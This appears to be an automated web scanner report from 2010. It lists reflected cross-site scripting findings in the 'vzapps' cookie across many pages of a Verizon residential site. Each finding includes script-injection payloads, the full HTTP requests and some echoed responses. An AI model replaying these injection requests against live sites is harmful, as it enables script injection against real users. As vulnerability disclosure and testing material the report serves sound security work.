GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8d1de'><script>alert(1)</script>c5602c17654; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 97b68<script>alert(1)</script>c16b73f542d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Overview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX97b68<script>alert(1)</script>c16b73f542d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee786'><script>alert(1)</script>78ce639b9c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Overview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXee786'><script>alert(1)</script>78ce639b9c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 513ee<script>alert(1)</script>274881b5bf8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX513ee<script>alert(1)</script>274881b5bf8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 148890 Expires: Sat, 20 Nov 2010 00:12:18 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:18 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX513EE<SCRIPT>ALERT(1)</SCRIPT>274881B5BF8 </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c469d'><script>alert(1)</script>c411bde7de8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXc469d'><script>alert(1)</script>c411bde7de8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 148894 Expires: Sat, 20 Nov 2010 00:11:52 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:52 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <input type='hidden' id='locationInfo' value='TXC469D'><SCRIPT>ALERT(1)</SCRIPT>C411BDE7DE8 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3a42'><script>alert(1)</script>fbf87ca090d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXb3a42'><script>alert(1)</script>fbf87ca090d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 184ee<script>alert(1)</script>f56d57ce32c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX184ee<script>alert(1)</script>f56d57ce32c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18907'><script>alert(1)</script>cc88d71fd80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX18907'><script>alert(1)</script>cc88d71fd80; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 9ef9c<script>alert(1)</script>ac3a5bc187c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX9ef9c<script>alert(1)</script>ac3a5bc187c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f58f'><script>alert(1)</script>45f51d22094 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Overview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8f58f'><script>alert(1)</script>45f51d22094; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8e5cb<script>alert(1)</script>29788bcdb3c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Overview.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8e5cb<script>alert(1)</script>29788bcdb3c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 323cd'><script>alert(1)</script>db7eded9442 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX323cd'><script>alert(1)</script>db7eded9442; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a1439<script>alert(1)</script>7afc59f4fcb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/Plans/Plans.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXa1439<script>alert(1)</script>7afc59f4fcb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3eca3<script>alert(1)</script>d981b509d0a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX3eca3<script>alert(1)</script>d981b509d0a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6db83'><script>alert(1)</script>29aa0ccd992 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX6db83'><script>alert(1)</script>29aa0ccd992; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload f4176<script>alert(1)</script>334615d8942 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXf4176<script>alert(1)</script>334615d8942; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71893 Expires: Sat, 20 Nov 2010 00:13:07 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:13:07 GMT Connection: close Set-Cookie: ContextInfo_State=TXf4176<script>alert(1)</script>334615d8942; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cfc4'><script>alert(1)</script>fd78a1ef0ca was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4cfc4'><script>alert(1)</script>fd78a1ef0ca; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70302 Expires: Sat, 20 Nov 2010 00:12:38 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:38 GMT Connection: close Set-Cookie: ContextInfo_State=TX4cfc4'><script>alert(1)</script>fd78a1ef0ca; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fff9'><script>alert(1)</script>5f319f2b2d3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8fff9'><script>alert(1)</script>5f319f2b2d3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71904 Expires: Sat, 20 Nov 2010 00:10:12 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:12 GMT Connection: close Set-Cookie: ContextInfo_State=TX8fff9'><script>alert(1)</script>5f319f2b2d3; path=/
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 306e5<script>alert(1)</script>de57f988df3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX306e5<script>alert(1)</script>de57f988df3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71900 Expires: Sat, 20 Nov 2010 00:10:27 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:27 GMT Connection: close Set-Cookie: ContextInfo_State=TX306e5<script>alert(1)</script>de57f988df3; path=/
